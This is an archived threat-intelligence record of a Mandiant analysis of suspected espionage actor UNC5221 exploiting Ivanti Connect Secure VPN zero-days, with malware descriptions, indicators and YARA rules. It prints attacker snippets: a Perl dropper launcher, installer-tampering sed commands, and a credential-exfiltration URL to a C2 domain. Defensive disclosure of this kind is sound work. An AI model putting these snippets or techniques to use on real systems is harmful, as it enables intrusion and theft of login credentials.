{
	"id": "bb038057-3181-48d9-88e2-1e4372f55ad0",
	"created_at": "2026-04-06T00:07:48.937998Z",
	"updated_at": "2026-04-10T03:28:20.597041Z",
	"deleted_at": null,
	"sha1_hash": "63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d",
	"title": "Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN in New Zero-Day Exploitation",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 98494,
	"plain_text": "Cutting Edge: Suspected APT Targets Ivanti Connect Secure VPN\r\nin New Zero-Day Exploitation\r\nBy Mandiant\r\nPublished: 2024-01-11 · Archived: 2026-04-02 11:37:01 UTC\r\nWritten by: Tyler McLellan, John Wolfram, Gabby Roncone, Matt Lin, Robert Wallace, Dimiter Andonov\r\nNote: This is a developing campaign under active analysis by Mandiant and Ivanti. We will continue to add more\r\nindicators, detections, and information to this blog post as needed.\r\nOn January 10, 2024, Ivanti disclosed two vulnerabilities, CVE-2023-46805 and CVE-2024-21887, impacting\r\nIvanti Connect Secure VPN (“CS”, formerly Pulse Secure) and Ivanti Policy Secure (“PS”) appliances. Successful\r\nexploitation could result in authentication bypass and command injection, leading to further downstream\r\ncompromise of a victim network. Mandiant has identified zero-day exploitation of these vulnerabilities in the wild\r\nbeginning as early as December 2023 by a suspected espionage threat actor, currently being tracked as UNC5221.\r\nIvanti has been working closely with Mandiant, affected customers, government partners, and Volexity to address\r\nthese issues. As part of their investigation, Ivanti has released a blog post and mitigations for the vulnerabilities\r\nexploited in this campaign to assist with determining if systems have been impacted. Patches are currently being\r\ndeveloped and Ivanti customers are urged to follow the KB article to stay informed on target dates and releases.\r\nMandiant is sharing details of five malware families associated with the exploitation of CS and PS devices. These\r\nfamilies allow the threat actors to circumvent authentication and provide backdoor access to these devices.\r\nAdditional post-exploitation tools have also been identified in our investigation and are highlighted further in this\r\npost.\r\nPost Exploitation Activity\r\nFollowing the successful exploitation of CVE-2023-46805 (authentication bypass) and CVE-2024-21887\r\n(command injection), UNC5221 leveraged multiple custom malware families, in several cases trojanizing\r\nlegitimate files within CS with malicious code. UNC5221 was also observed leveraging the PySoxy tunneler and\r\nBusyBox to enable post-exploitation activity.\r\nDue to certain sections of the device being read-only, UNC5221 leveraged a Perl script ( sessionserver.pl ) to\r\nremount the filesystem as read/write and enable the deployment of THINSPOOL, a shell script dropper that writes\r\nthe web shell LIGHTWIRE to a legitimate Connect Secure file, and other follow-on tooling.\r\nuse lib ($ENV{'DSINSTALL'} =~ /(\\S*)/)[0] . \"/perl\";\r\nuse DSSafe;\r\nsystem(\"mount -o remount,rw /\");\r\nhttps://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day\r\nPage 1 of 7\n\nsystem(\"chmod a+x /home/etc/sql/dsserver/sessionserver.sh\");\r\nsystem(\"/home/etc/sql/dsserver/sessionserver.sh 1\u003e/dev/null 2\u003e/tmp/errlog\");\r\nsystem(\"mount -o remount,ro /\");\r\nMandiant has determined that THINSPOOL acts as a key tool for both persistence and detection evasion, in\r\naddition to being the initial dropper for the LIGHTWIRE web shell used by UNC5221 for post-exploitation\r\nactivity. The LIGHTWIRE and WIREFIRE web shells used by UNC5221, post-compromise, are lightweight\r\nfootholds enabling further and continued access to the CS appliances. This indicates that these are not\r\nopportunistic attacks, and UNC5221 intended to maintain its presence on a subset of high priority targets that it\r\ncompromised after a patch was inevitably released. Additionally, the WARPWIRE Javascript credential stealer\r\nmay also enable further access to accounts for lateral movement or espionage by capturing plaintext login\r\ncredentials.\r\nCustom Malware Identified\r\nZIPLINE Passive Backdoor\r\nZIPLINE is a passive backdoor that hijacks an exported function, accept() , from the file libsecure.so. When\r\nZIPLINE invokes the hijacked accept() function, it first resolves the benign accept() from libc , to\r\nintercept network traffic. Once an incoming connection is registered, it is first processed by the benign\r\nlibc_accept , and ZIPLINE then checks if the process name is “web”. The malware retrieves up to 21 bytes\r\nfrom the connected host, verifying if the received buffer corresponds to the string “SSH-2.0-OpenSSH_0.3xx.” If\r\nso, the malicious functionality of ZIPLINE is triggered. ZIPLINE will then receive an encrypted header which\r\nspecifies the command to be executed. Further details about this hijacking technique for the accept() function\r\ncan be found in this SecureIdeas post.\r\nZIPLINE supports the following commands:\r\nCommand ID | Operation | Description\r\n1 | File Upload | The command contains the path of the file to be sent to the connected host.\r\n2 | File Download | The command contains the file path and its content to be saved on the compromised system.\r\n3 | Reverse Shell | A reverse shell is created using /bin/sh and the provided command is executed.\r\n4 | Proxy Server | Creates a proxy server with an IP address provided as part of the command.\r\n5 | Tunneling Server | Implements a tunneling server, capable of simultaneously dispatching traffic between multiple endpoints.\r\nUpon initialization, ZIPLINE copies /etc/ld.so.preload to /tmp/data/root/etc/ld.so.preload , which will\r\nbe executed if the process name is “dspkginstall”. ZIPLINE then copies itself to /tmp/data/root/home/lib .\r\nUpon termination ZIPLINE first checks if the process name is tar. If the process name is tar, the malware executes\r\ndifferent functionalities based on the provided parameters: -xzf , --exclude , or ./installer .\r\nIf the parameter --exclude is used, ZIPLINE will add itself to the CS exclusion_list . The exclusion_list\r\nis part of the Ivanti Integrity Checker Tool and Mandiant assesses this is a measure implemented by the attacker to\r\nevade detection.\r\nIf the parameter -xzf is used, ZIPLINE computes its own SHA256 hash, formats the line ./root , and then\r\nappends this string to each file within the ./installer/bom_files directory. This is achieved using the\r\ncommand: echo \u003e\u003e ./installer/bom_files/ .\r\nIf the parameter ./installer is used, ZIPLINE deletes specific lines from /pkg/do-install and\r\n./installer/do-install . To do so, it executes the following sed commands:\r\nsed -i '/retval=$(exec $installer $@)/d' /pkg/do-install\r\nsed -i '/exit $?/d' /pkg/do-install\r\nsed -i '/retval=$(exec $installer $@)/d' ./installer/do-install\r\nsed -i '/exit $?/d' ./installer/do-install\r\nTHINSPOOL Dropper\r\nTHINSPOOL is a dropper written in shell script that writes the web shell LIGHTWIRE to a legitimate CS file.\r\nTHINSPOOL will re-add the malicious web shell code to legitimate files after an update, allowing UNC5221 to\r\npersist on the compromised devices. THINSPOOL attempts to evade Ivanti’s Integrity Checker but Mandiant\r\nobserved this attempt failed.\r\nLIGHTWIRE and WIREFIRE Web Shells\r\nLIGHTWIRE is a web shell written in Perl CGI that is embedded into a legitimate Secure Connect file to enable\r\narbitrary command execution. LIGHTWIRE intercepts requests to compcheckresult.cgi that contain the\r\nparameters “ comp=comp ” and “ compid ”, where “ compid ” contains Base64-encoded and RC4-encrypted\r\nciphertext. The decoded cleartext is interpreted and executed as Perl code.\r\nWIREFIRE is a web shell written in Python that exists as trojanized logic to a component of the Connect Secure\r\nappliance. WIREFIRE supports downloading files to the compromised device and executing arbitrary commands.\r\nIt contains logic inserted before authentication that responds to specific HTTP POST requests to\r\n/api/v1/cav/client/visits . If formdata entry “ file ” exists, the web shell saves the content to the device\r\nwith a specified filename; if not, the web shell attempts to decode, decrypt, and zlib decompress any raw data\r\nexisting after a GIF header to execute as a subprocess. The output of the executed process will be zlib compressed,\r\nAES-encrypted with the same key, and Base64-encoded before being sent back as JSON with a “ message ” field\r\nvia an HTTP 200 OK.\r\nWARPWIRE Credential Harvester\r\nWARPWIRE is a credential harvester written in Javascript that is embedded into a legitimate Connect Secure file.\r\nWARPWIRE targets plaintext passwords and usernames which are submitted via an HTTP GET request to a\r\ncommand and control (C2) server.\r\nWARPWIRE captures credentials submitted during the web logon to access layer 7 applications, like RDP.\r\nCaptured credentials are Base64-encoded with btoa() before they are submitted to the C2 via an HTTP GET\r\nrequest.\r\nhxxps://symantke[.]com/?\u003cusername\u003e\u0026\u003cpassword\u003e\r\nAttribution\r\nAt the time of publication, Mandiant had not linked this activity to a previously known group, nor do we currently\r\nhave enough data to assess the origin of this threat actor. UNC5221 was created to track this suspected espionage\r\nactor. The targeting of edge infrastructure with zero-day vulnerabilities has been a consistent tactic leveraged by\r\nespionage actors to enable their operations. Additionally, Mandiant has previously observed multiple suspected\r\nAPT actors utilizing appliance specific malware to enable post-exploitation and evade detection. These instances,\r\ncombined with Volexity’s findings around targeting, lead Mandiant to suspect this is an espionage-motivated APT\r\ncampaign.\r\nUNC5221 primarily used compromised out-of-support Cyberoam VPN appliances for C2. These compromised\r\ndevices were domestic to the victims, which likely helped the threat actor to better evade detection.\r\nConclusion \u0026 Recommendations\r\nUNC5221’s activity demonstrates that exploiting and living on the edge of networks remains a viable and\r\nattractive target for espionage actors. As we have previously reported, the combination of zero-day exploitation,\r\nedge device compromise, use of compromised C2 infrastructure, and detection evasion methods such as writing\r\ncode to legitimate files have become a hallmark of espionage actors’ toolboxes.\r\nWe recommend following the guidance outlined in the Ivanti blog post on this activity. Ivanti customers are urged\r\nto implement mitigation as soon as possible and to follow the post for upcoming patch release schedules. Details\r\nabout Ivanti’s Integrity Checker Tool (ICT) are also available.\r\nAcknowledgement\r\nWe would like to thank the team at Ivanti for their partnership and support in this investigation. Additionally, this\r\nanalysis would not have been possible without the assistance from people across Mandiant Intelligence,\r\nConsulting, and FLARE as well as our colleagues on Google TAG. We would like to specifically acknowledge\r\nAseel Kayal and Nick Simonian from Mandiant’s Adversary Methods Research and Discovery (RAD) team for\r\ntheir support of this investigation.\r\nIndicators of Compromise (IOCs)\r\nCode Family Filename Description\r\nLIGHTWIRE compcheckresult.cgi Web shell\r\nTHINSPOOL sessionserver.sh Web shell dropper\r\nWARPWIRE lastauthserverused.js Credential harvester\r\nWIREFIRE visits.py Web shell\r\nTHINSPOOL Utility sessionserver.pl Script\r\nZIPLINE libsecure.so.1 Passive backdoor\r\nNetwork-Based Indicators (NBIs)\r\nsymantke[.]com WARPWIRE C2\r\nYARA Rule\r\nrule M_Hunting_Dropper_WIREFIRE_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects WIREFIRE, a web shell written in Python that exists as trojanized logic to a component of the Connect Secure appliance.\"\r\n md5 = \"6de651357a15efd01db4e658249d4981\"\r\n strings:\r\n $s1 = \"zlib.decompress(aes.decrypt(base64.b64decode(\" ascii\r\n $s2 = \"aes.encrypt(t+('\\\\x00'*(16-len(t)%16))\" ascii\r\n $s3 = \"Handles DELETE request to delete an existing visits data.\" ascii\r\n $s4 = \"request.data.decode().startswith('GIF'):\" ascii\r\n $s5 = \"Utils.api_log_admin\" ascii\r\n condition:\r\n filesize \u003c 10KB\r\n and all of them\r\n}\r\nrule M_Hunting_Webshell_LIGHTWIRE_2 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects LIGHTWIRE based on the RC4 decoding and execution 1-liner.\"\r\n md5 = \"3d97f55a03ceb4f71671aa2ecf5b24e9\"\r\n strings:\r\n $re1 = /eval\\{my.{1,20}Crypt::RC4-\u003enew\\(\\\".{1,50}-\u003eRC4\\(decode_base64\\(CGI::param\\(\\'.{1,30};eval\\s\\$.{1,30}\\\"Compatibility\\scheck:\\s\\$@\\\";\\}/\r\n condition:\r\n filesize \u003c 10KB\r\n and all of them\r\n}\r\nrule M_Hunting_Dropper_THINSPOOL_1 {\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects THINSPOOL, a dropper that installs the LIGHTWIRE web shell onto a Pulse Secure system.\"\r\n md5 = \"677c1aa6e2503b56fe13e1568a814754\"\r\n strings:\r\n $s1 = \"/tmp/qactg/\" ascii\r\n $s2 = \"echo '/home/config/dscommands'\" ascii\r\n $s3 = \"echo '/home/perl/DSLogConfig.pm'\" ascii\r\n $s4 = \"ADM20447\" ascii\r\n condition:\r\n filesize \u003c 10KB\r\n and all of them\r\n}\r\nrule M_Hunting_CredTheft_WARPWIRE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"This rule detects WARPWIRE, a credential stealer written in Javascript that is embedded into a legitimate Pulse Secure file.\"\r\n md5 = \"d0c7a334a4d9dcd3c6335ae13bee59ea\"\r\n strings:\r\n $s1 = {76 61 72 20 77 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 3b}\r\n $s2 = {76 61 72 20 73 64 61 74 61 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 66 72 6d 4c 6f 67 69 6e 2e 70 61 73 73 77 6f 72 64 2e 76 61 6c 75 65 3b}\r\n $s3 = {2b 77 64 61 74 61 2b 27 26 27 2b 73 64 61 74 61 3b}\r\n $s4 = {76 61 72 20 78 68 72 20 3d 20 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74}\r\n $s5 = \"Remember the last selected auth realm for 30 days\" ascii\r\n condition:\r\n filesize \u003c 8KB and all of them\r\n}\r\nSource: https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/suspected-apt-targets-ivanti-zero-day"
	],
	"report_names": [
		"suspected-apt-targets-ivanti-zero-day"
	],
	"threat_actors": [
		{
			"id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8",
			"created_at": "2024-01-18T02:02:34.643994Z",
			"updated_at": "2026-04-10T02:00:04.959645Z",
			"deleted_at": null,
			"main_name": "UNC5221",
			"aliases": [
				"UNC5221",
				"UTA0178"
			],
			"source_name": "ETDA:UNC5221",
			"tools": [
				"BRICKSTORM",
				"GIFTEDVISITOR",
				"GLASSTOKEN",
				"LIGHTWIRE",
				"PySoxy",
				"THINSPOOL",
				"WARPWIRE",
				"WIREFIRE",
				"ZIPLINE"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9",
			"created_at": "2024-01-12T02:00:04.33082Z",
			"updated_at": "2026-04-10T02:00:03.517264Z",
			"deleted_at": null,
			"main_name": "UTA0178",
			"aliases": [
				"UNC5221",
				"Red Dev 61"
			],
			"source_name": "MISPGALAXY:UTA0178",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "81dde5cc-c29f-430d-8c6e-e5e92d5015e7",
			"created_at": "2022-10-25T16:07:23.704358Z",
			"updated_at": "2026-04-10T02:00:04.718034Z",
			"deleted_at": null,
			"main_name": "Harvester",
			"aliases": [],
			"source_name": "ETDA:Harvester",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Graphon",
				"Metasploit",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434068,
	"ts_updated_at": 1775791700,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d.pdf",
		"text": "https://archive.orkl.eu/63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d.txt",
		"img": "https://archive.orkl.eu/63fe1a862d947aa8aa1ac4ae171b34c0d41ed35d.jpg"
	}
}